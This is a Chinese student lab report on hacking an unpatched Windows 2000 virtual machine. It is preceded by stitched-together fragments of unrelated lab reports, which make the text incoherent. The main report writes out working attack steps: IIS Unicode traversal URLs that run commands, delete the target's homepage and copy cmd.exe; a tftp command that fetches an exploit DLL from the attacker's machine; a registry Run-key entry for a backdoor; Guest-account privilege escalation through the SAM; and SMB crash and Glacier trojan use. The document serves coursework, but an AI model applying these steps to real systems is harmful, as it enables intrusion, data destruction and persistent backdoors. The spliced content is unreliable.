中南大学信息安全工程实验报告
信息安全工程实验报告

中南大学信息安全工程实验报告学生姓名学院信息科学与工程学院专业班级信息安全完成时间 2016年月日目录1. 实验1 (3)1.1 实验内容 (3)1.2 实验过程 (3)2.实验2 (7)2.1 实验内容 (7)2.2 实验过程 (7)3.实验3 (15)3.1 实验内容 (15)3.2 实验过程 (16)4.实验4 (23)4.1 实验内容 (23)4.2 实验背景 (23)4.3 实验过程 (25)5. 实验5 (36)5.1 实验内容 (36)5.2 实验过程 (36)6.实验6 (41)6.1 实验内容 (41)6.2 实验过程 (41)7.实验7 (48)7.1 实验内容 (48)7.2 实验背景 (48)7.3 实验过程 (49)8.实验8 (56)8.1 实验内容 (56)8.2 实验背景 (56)8.3 实验过程 (60)9.实验总结 (66)信息安全工程1.实验11.1 实验内容抓取ping和Telnet的数据报,并简要分析IP头的结构。
1.2 实验过程安装VMware并且打开已经配置好的虚拟机。
配置VMwre虚拟机:为了使所有的网络安全攻击实验都可以成功完成,在虚拟上安装没有打过任何补丁的Windows Advanced Server2000。
启动成功后,进入操作系统,配置虚拟机上操作系统的IP地址,之前查询得到物理主机IP地址为192.168.1.3,使之和主机能够通过网络进行通信,配置虚拟机操作系统的IP地址应与物理主机在同一网段,实验设为:192.168.1.43利用Ping指令来测试网络是否连通。
在主机的DOS窗口中输入“Ping 192.168.1.3”,ping通截图如下:利用wireshark抓包:Ping之前打开wireshark软件,点击开始抓包,找到主机间通信的数据包信息如下:开启Telnet服务:Telnet给用户提供了一种通过网络登录远程服务器的方式,通过端口23工作。
中南大学计算机网络实验报告

计算机网络实验报告专业班级:信息安全1202班指导老师:王伟平姓名:学号:0909122824实验一分槽ALOHA协议仿真实验【实验目的】1.掌握VB、VC++、VS或JA V A等集成开发环境编写仿真程序的方法;2.理解并掌握分槽ALOHA协议原理。
【实验内容】编写仿真程序,对一定网络环境下MAC层的多路访问协议的分槽ALOHA协议进行实现。
通过仿真,学习协议采取的介质访问管理,包括介质分配和冲突解决机制,并对协议的性能与理论结果进行比较分析。
【编程语言和环境】1.编程语言C/C++/C#/Java/Matlab等均可;2.编程环境Windows(MS Visual系列,VC/VB/;)和Linux(编辑器vi+编译器GCC)均可;【实验原理】用于在多路访问信道上确定下一个使用者的协议属于数据链路层的一个子层,称为介质访问控制(Medium Access Control,MAC)子层,许多局域网都使用多路访问信道作为它的通信基础。
最简单的信道分配方案是FDM(为每个站专门分配一段频率)和TDM(为每个站分配一个时槽),当站的数量比较大而且可变,或者流量具有突发性变化的时候,就需要用到纯ALOHA协议或分槽ALOHA协议。
分槽ALOHA的基本思想是把信道时间分成离散的时间槽,槽长为一个帧所需的发送时间,站点在时槽开始时发送。
如果冲突,那么间隔一定时间后重新发送。
主要过程是设置各站点初始产生包的时间点及产生包的时间间隔(均为随机值),得到所有站点成功发送10000个数据包的总时间以及这段时间内所有数据包的个数(包括各站点每次新产生的包以及由于冲突而重发的包),从而计算出每包时内尝试次数及其对应的吞吐量。
【流程图】【关键代码说明】1.初始化时槽:time t = new time();t.setN(i); //第N 个时槽2.初始化站点:AlohaThread at1 = new AlohaThread(sp1,j,a);//开始发送时间private long start;//时间间隔private long d;3.若此时槽只有一个数据包,则发送成功;若有两个以上数据包,则冲突。
信息安全实验总结报告

信息安全实验总结报告信息安全实验总结报告篇一:信息安全实验报告课程名称:信息安全实验名称:共五次实验班级:姓名:同组人:指导教师评定:签名:实验一木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验原理木马的全称为特洛伊木马,源自古希腊神话。
木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。
它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。
1.木马的特性(1)伪装性 (2)隐藏性 (3)破坏性(4)窃密性2.木马的入侵途径木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。
3.木马的种类(1)按照木马的发展历程,可以分为4个阶段:第1代木马是伪装型病毒,第2代木马是网络传播型木马,第3代木马在连接方式上有了改进,利用了端口反弹技术,例如灰鸽子木马,第4代木马在进程隐藏方面做了较大改动,让木马服务器端运行时没有进程,网络操作插入到系统进程或者应用进程中完成,例如广外男生木马。
(2)按照功能分类,木马又可以分为:破坏型木马,主要功能是破坏并删除文件;服务型木马; DoS攻击型木马;远程控制型木马三、实验环境两台运行Windows 2000/XP的计算机,通过网络连接。
使用“冰河”和“广外男生”木马作为练习工具。
四、实验内容和结果任务一“冰河”木马的使用1.使用“冰河”对远程计算机进行控制我们在一台目标主机上植入木马,在此主机上运行G_Server,作为服务器端;在另一台主机上运行G_Client,作为控制端。
打开控制端程序,单击快捷工具栏中的“添加主机”按钮,弹出如图1-5所示对对话框。
信息安全实验报告

信息安全实验报告一、实验目的随着信息技术的飞速发展,信息安全问题日益凸显。
本次实验的目的在于深入了解信息安全的重要性,通过实际操作和分析,掌握常见的信息安全攻击与防御手段,提高对信息安全风险的识别和应对能力。
二、实验环境本次实验在以下环境中进行:1、操作系统:Windows 10 专业版2、应用软件:Wireshark 网络协议分析工具、Metasploit 渗透测试框架、Nmap 网络扫描工具等3、网络环境:实验室内部局域网三、实验内容(一)网络扫描与漏洞探测使用 Nmap 工具对目标网络进行扫描,获取网络中的主机信息、开放端口和服务等。
通过分析扫描结果,发现了一些潜在的安全漏洞,如某些主机开放了不必要的端口,可能会被攻击者利用。
(二)密码破解实验选取了一些常见的密码加密算法,如 MD5、SHA-1 等,使用相应的破解工具进行密码破解实验。
结果表明,简单的密码容易被快速破解,强调了设置复杂密码的重要性。
(三)网络嗅探与数据包分析利用 Wireshark 工具进行网络嗅探,捕获网络中的数据包。
对捕获的数据包进行详细分析,包括源地址、目的地址、协议类型、数据内容等。
通过分析发现了一些异常的网络流量,如大量的广播包可能是网络攻击的前奏。
(四)SQL 注入攻击实验搭建了一个简单的 Web 应用程序,并尝试进行 SQL 注入攻击。
成功地通过输入恶意的 SQL 语句获取了数据库中的敏感信息,揭示了Web 应用中 SQL 注入漏洞的严重威胁。
(五)缓冲区溢出攻击实验通过编写特定的程序,尝试进行缓冲区溢出攻击。
了解了缓冲区溢出攻击的原理和危害,以及如何通过合理的编程和安全机制来防范此类攻击。
四、实验结果与分析(一)网络扫描与漏洞探测结果分析Nmap 扫描结果显示,部分主机存在开放端口过多、服务版本过低等问题。
这些漏洞可能被黑客利用进行进一步的攻击,如端口扫描、服务漏洞利用等。
(二)密码破解实验结果分析简单的密码如“123456”、“password”等在短时间内就被破解,而复杂的密码如包含大小写字母、数字和特殊字符的组合则具有较高的安全性。
中南大学网络安全课外实验报告心脏滴血

中南大学CENTRAL SOUTH UNIVERSITY《SEED PROJECT》实验报告学生姓名孙毅学号 0906140106指导教师王伟平学院信息科学与工程专业班级信安1401完成时间2016.12目录一、实验原理 (1)二、实验过程 (2)三、实验结果以及讨论 (5)Heartbleed Attack一、实验原理Heartbleed bug (CVE-2014-0160)是旧版本的Openssl库中一个的一个漏洞。
利用这个漏洞,攻击者可以从服务器里窃取一部分随机数据。
这个漏洞主要是源于Openssl设计的协议继承了Heartbeat协议,使用SSL/TLS来保持连接的实时性、保活性。
原理示意图如下:二、实验过程首先要按照指导进行如下操作:访问您的浏览器https://。
登录网站管理员。
(用户名:admin密码:seedelgg;)增加朋友。
(去更多->点击波比->添加朋友),然后发送私人消息。
在您已经做了足够的互动作为合法用户,你可以发动攻击,看看你可以从受害者服务器上得到什么信息。
编写程序从零开始推出Heartbleed攻击是不容易的,因为它需要的心跳协议底层的知识。
幸运的是,其他人已经写了攻击代码。
因此,我们将使用现有的代码来获得在Heartbleed攻击的第一手经验。
我们使用的代码称为attack.py,原本是Jared Stafford写的。
我们对教育目的的代码做了一些小的修改。
您可以从实验室的网站上下载代码,更改其权限,所以该文件是可执行的。
然后,您可以运行攻击代码如下:$ / attack.py 。
您可能需要多次运行攻击代码以获取有用的数据。
尝试,看看是否可以从目标服务器获取以下信息。
用户名和密码。
用户活动(用户所做的)。
私人信息的确切内容。
在这个任务中,学生将比较良性包和被攻击者发送的代码发送的恶意数据包的去发现Heartbleed漏洞的根本原因。
Heartbleed攻击是基于heartbeatrequest。
信息安全工程实训报告

一、实训背景与目的随着信息技术的飞速发展,信息安全问题日益凸显。
为了提高我国信息安全人才的培养质量,增强学生的实际操作能力,我校组织了信息安全工程实训。
本次实训旨在使学生了解信息安全的基本理论,掌握信息安全技术的实际应用,培养学生的信息安全意识,提高其在网络安全、数据保护、系统安全等方面的实践能力。
二、实训内容与过程(一)实训内容1. 网络安全基础- 学习网络协议与体系结构- 网络安全防护技术- 网络攻击与防御手段2. 操作系统安全- Windows、Linux操作系统的安全配置- 操作系统漏洞分析与修复- 权限管理与访问控制3. 数据库安全- 常见数据库系统(如MySQL、Oracle)的安全配置- 数据库安全漏洞分析与防护- 数据备份与恢复4. 应用系统安全- 常见Web应用的安全漏洞分析- Web应用防火墙与入侵检测系统- 移动应用安全5. 信息安全实践- 网络攻防演练- 系统安全评估- 安全事件应急响应(二)实训过程1. 理论学习实训开始前,我们通过查阅教材、资料和参加讲座,对信息安全的基本理论进行了系统学习。
2. 实验操作在实训过程中,我们按照实训指导书的要求,进行了各项实验操作,包括网络安全配置、操作系统安全加固、数据库安全防护等。
3. 实践项目我们参与了多个实践项目,如网络安全攻防演练、系统安全评估等,通过实际操作,加深了对信息安全技术的理解。
4. 小组讨论在实训过程中,我们定期进行小组讨论,分享学习心得和实验经验,互相学习,共同进步。
三、实训成果与收获(一)实训成果1. 掌握了信息安全的基本理论和技术2. 熟悉了各种安全工具和软件的使用3. 提高了网络安全防护和应急响应能力4. 培养了团队合作精神和沟通能力(二)实训收获1. 增强了信息安全意识,认识到信息安全的重要性2. 提高了实践能力,为今后的工作奠定了基础3. 了解了信息安全行业的现状和发展趋势4. 结识了一群志同道合的朋友,共同进步四、总结与展望通过本次信息安全工程实训,我们不仅学到了丰富的信息安全知识,还提高了实践能力。
信息安全专业实习报告

信息安全专业实习报告信息安全专业实习报告(精选11篇)接地气的实习生活已经告一段落,这次实习让你心中有什么感想呢?如果我们能够写好实习报告,可以收获更多。
是不是无从下笔、没有头绪?下面是店铺精心整理的信息安全专业实习报告(精选11篇),仅供参考,欢迎大家阅读。
信息安全专业实习报告篇1实习时间:20xx年x月x日-x月x日实习地点:xx实习过程及体会:我是xxx计算机职业技术学院信息安全专业的学生,去年xx月份从学校出来后,我来到xxx网站开始自已为期xx个月的实习工作,在这几个月的实习工作中,我主要负责网站编辑工作,在工作中,我学到和领悟到很多东西,实习期间,我努力将自己在校学习的理论知识向实践方面转化,尽量做到理论和实际相结合。
在实习期间,能遵守工作纪律,不迟到,不早退,认真完成领导交给的工作。
我做的是网站的新闻编辑工作,负责把一些收集来的新闻进行加工和编辑,再放到网站上供网友阅读。
这个网站是附属于xx区xx书店集团公司的,是集团里的一个媒体,所以还有网站上也有一些集团内部的新闻。
我就负责去采集新闻材料,撰写新闻稿。
因为是读书网站,面向大众,所以还要在网站上进行新书推荐,把书的内容编辑后放到网站上供书友阅读。
此网站还有论坛和博客板块,我也负责在里面发发贴,自己写一些文章放到博学客习上网面。
实习期间,我利用此次难得的机会,努力工作,认真学习,严格要求自己,虚心向领导请教。
其实我们大一学习的多为基础课,专业课程还没开课,但是这些网站上一般的工作都还能应付。
在工作中,我提高自己运用word,excel等常用软件的能力,学会如何去采集资料和撰写写作新闻稿,提高自己的文字运用能力和写作水平。
“纸上得来终觉浅,绝知此事要躬行。
”在短暂的实习过程中,我深深的感觉到自己所学知识的肤浅和在实际运用中的专业知识的匮乏,刚开始的一段时间里,对一些工作感到无从下手,茫然不知所措。
在学校总以为自己学的不错,一旦接触到实际,才发现自己知道的是多么少,这时才真正领悟到“学无止境”的含义。
中南大学操作系统实验报告

中南大学操作系统实验报告操作系统实验报告学生姓名王朝晖学号 0906160216 专业班级信息安全 1602 指导教师宋虹学院信息科学与工程学院完成时间 20__ 年 5 月 27 日目录(格式二) 目录一操作系统模拟实验概述 ...................................................... ......................................................... ..........1(一)实验目的 ...................................................... .............................................1(二)实验内容及要求 ...................................................... .................................11.实验要求 ............................................................................................................... .....................1 (三)实验过程及分析 ...................................................... .................................2初步设计 ...................................................... ......................................................... .........................2 详细设计 ...................................................... ......................................................... .........................2 结束语 ...................................................... ......................................................... .............................................6 (附件)程序代码 ...................................................... ......................................................... .........................7 Windows 安全实验 ...................................................... ......................................................... ........................41 使用 Microsoft 基准安全分析器 MBSA 2.3 对系统进行安全评估 ...............41设置 Windows 的安全模式,配置本地安全策略,包括以下内容 ................41Linu_ 安全实验 ...................................................... ......................................................... .............................48 扩展安全实验 ...................................................... ......................................................... ...............................66 1.修改 ssh 默认连接 22 端口和添加防火墙 firewalld 通过端口 ...................................66 2.禁止 root 帐号直接登录 ...................................................... .................................................67 3.安装 DenyHosts 【拦截获取攻击的 IP ,生成黑名单,防止再次攻击】.......................70第 1 页共 40 页一一操作系统模拟实验概述(一)实验目的本项目完成一个小型的操作系统进程调度、内存动态分配的仿真程序。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
信息安全工程实验报告学院:信息科学与工程学院班级:学号:姓名:目录实验一 (3)实验二 (7)实验三 (10)实验四 (13)实验六 (18)实验七 (24)实验八 (29)总结 (35)实验一一配置VM虚拟机1、先查看主机的ip地址为10.96.26.2052、将虚拟机的ip地址设置成和主机同一网段的3、在主机对虚拟机ping 测试两者是否连通经测试两者连通4、打开wireshark,设置过滤项源ip和目的ip :ip.dst==10.96.94.25&&ip.src==10.96.80.155设置只抓tcp下的ftp和telnet协议:tcp.port==21||tcp.port==23抓取udp和icmp:udp||icmp先ping虚拟机,然后开始抓包,ping完后,停止抓包,抓包数据如下二开启telnet服务1、分别在主机和虚拟机上开启telnet服务主机的telnet在服务选项开启在主机的DOS窗口下Telnet虚拟机192.168.31.128为虚拟机的地址2、输入服务器的用户名和密码,显示telnet虚拟机成功实验二一、系统用户的扫描1、对ip地址为169.254.168.201的计算机进行扫描2、得到对方机器的用户列表可选择一个用户对其进行字典测试或穷举测试,字典测试需选择一个字典文本,穷举测试可以设置穷举所包含的内容。
选择administrator进行字典测试,得到密码为111二、端口扫描使用工具Portscan对ip地址为10.96.94.25的主机进行扫描,得到目标主机的所有开放端口三、共享目录扫描通过工具软件Shed来扫描对方主机,得到对方计算机提供了哪些目录共享。
在这里起始ip和目标ip都添目标主机ip点击可共享文件夹客队目标主机内的文件进行操作四、利用tcp协议进行端口扫描实现端口扫描的程序可以使用TCP协议和UDP协议,原理是利用Socket连接对方的计算机的某端口,试图和该端口建立连接,如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,以下为探测ip为10.96.78.201的23号端口是否开放的结果实验三一漏洞扫描1、使用xscan对windows 2000进行扫描,设置扫描参数及模块,扫描ip为10.96.44.230的主机2、开始进行漏洞扫描二网络监听使用win sniffer可截取局域网内的密码,由于我的电脑不能运行win sniffer,下面我们来了解一下基本使用方法1、点击工具栏Adapter,设置为本机的物理网卡2、使用dos命令进行远程FTP服务3、win sniffer已经记录下了刚才会话记录三得到管理员密码环境:windows2000所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,将FindPass.exe拷贝到C盘根目录,在DOS界面下执行该程序,将得到当前用户得登录名四普通用户建立管理员账号环境:windows 2000利用工具GetAdmin.exe可以在用普通用户帐号登录后,将自己加到管理员组或者新建一个具有管理员权限的用户。
执行程序GetAdmin.exe,程序自动读取所有用户列表,点击按钮“New”,输入要新建的管理员组的用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,添加成功。
实验四一office文档暴力破解1、设置word权限密码在工具——选项——安全性中设置密码为999保存并关闭该文档,然后打开,就需要输入密码2、使用工具软件Advanced Office XP Password Recovery可以快速破解Word文档密码,点击工具栏按钮“Open File”,打开刚才建立的Word文档,程序打开成功后会在Log Window中显示成功打开的消息二利用Unicode漏洞对对方主机进行操作1、使用X-Scan对目标主机10.96.44.230进行IIS扫描,Unicode漏洞属于IIS漏洞可以看出,存在许多系统的漏洞。
只要是/scripts开头的漏洞都是Unicode漏洞。
2、在浏览器中输入有Unicode的主机ip %c0%2f”就是“/”的Unicode编码这条语句是执行dir命令列出目录结构。
结果可以看到ip地址为10.96.44.230下的目录结构3、用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件。
http://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\boot.ini4、更改对方主页,已经知道对方网站的根路径在“C:\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”(IIS默认启动页面)来删除主页http://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\d efault.asp5、将cmd.exe文件拷贝到scripts目录,并改名为c.exehttp://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\c md.exe+c.exe以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:http://10.96.44.230/scripts/c.exe?/c+dir+c:\实验五一利用Unicode漏洞入侵系统1、使用工具软件tftpd32.exe建立服务器。
将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序2、这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll 文件。
在浏览器中执行命令:http://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10.96.78.200+get+id q.dll传送成功3、下面使用工具软件ispc.exe入侵对方系统。
拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:ispc.exe 10.96.44.230/scripts/idq.dll连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限但是这一步存在问题,说它没有idq.dll,不知道是什么问题二其他漏洞攻击1、打印漏洞:利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。
使用工具软件cniis.exe对ip地址为10.96.44.230的主机进行操作cniis 10.96.44.230 00表示该操作系统未打补丁2、SMB致命攻击SMB(Session Message Block,会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。
利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。
下面介绍利用SMBdie让对方操作系统系统重新启动或者蓝屏。
(1)攻击时输入对方的IP和对方的计算机名(2)点击kill,对方计算机会蓝屏或重启实验六一远程启动Telnet服务1、分别在主机和虚拟机上开启telnet服务主机的telnet在服务选项开启在主机的DOS窗口下Telnet虚拟机192.168.31.128为虚拟机的地址2、输入服务器的用户名和密码,显示telnet虚拟机成功二记录管理员口令修改过程首先在对方操作系统中执行Win2KPass.exe文件,当对方主机管理员密码修改并重启计算机以后,就在Winnt\temp目录下产生一个ini文件。
该程序执行完后会自己删除自己。
三建立Web服务和Telnet服务1、使用工具软件wnc.exe开启两个服务Web服务和Telnet服务。
在对方的命令行下执行wnc.exe,执行完毕后,利用命令“netstat -an”来查看开启的808(Web服务)和707(Telnet 服务)端口2、测试Web服务在浏览器地址栏中输入“http://10.96.44.230:808”,出现主机的盘符列表3、利用“telnet 10.96.44.230 707”命令,不用任何的用户名和密码就可以登录对方主机4、将wnc.exe加到自启动列表(1)在dos下执行reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v service /d wnc.exe(2)查看一下对方的注册表的自启动项,已经被修改四让禁用的Guest具有管理权限直接使用“regedit”命令打开注册表,该键值是隐藏的。
可以利用工具软件psu.exe得到该键值的查看和编辑权1、使用进程管理器查看winlogon的PID为196,执行命令“psu -p regedit -i pid”其中pid 为Winlogon.exe的进程号2、执行完命令以后,自动打开了注册表编辑器,查看SAM下的键值3、在Windows 2000操作系统上,Administrator一般为0x1f4,guest一般为0x1f5 。
根据“0x1f4”和“0x1f5”找到Administrator和guest帐户的配置信息拷贝000001F4下的键值全部覆盖到“000001F5”目录下的“F”键值中4、Guest帐户已经具有管理员权限了。
为了能够使Guest帐户在禁用的状态登录,下一步将Guest帐户信息导出注册表。
选择User目录,然后选择菜单栏“注册表”下的菜单项“导出注册表文件”,将该键值保存为一个配置文件5、分别删除Guest和“00001F5”两个目录,刷新对方主机的用户列表,会出现用户找不到的对话框。
然后再将刚才导出的信息文件,再导入注册表。
再刷新用户列表就不在出现该对话框了。
再查看一下计算机管理窗口中的Guest帐户,发现该帐户是禁用的6、注销退出系统,然后用用户名:“guest”,密码:“123456”登录系统实验七一使用“冰河”进行远程控制1、在被控制端运行冰河服务器端程序将win32.exe传到被攻击主机,在DOS下运行该程序,执行完win32.exe文件以后,系统没有任何反应,其实已经更改了注册表,并将服务器端程序和文本文件进行了关联,当用户双击一个扩展名为txt的文件的时候,就会自动执行冰河服务器端程序2、在本机进行操作,在出现的对话框中选择服务器端程序win32.exe进行配置,并填写访问服务器端程序的口令,这里设置为“1234567890”。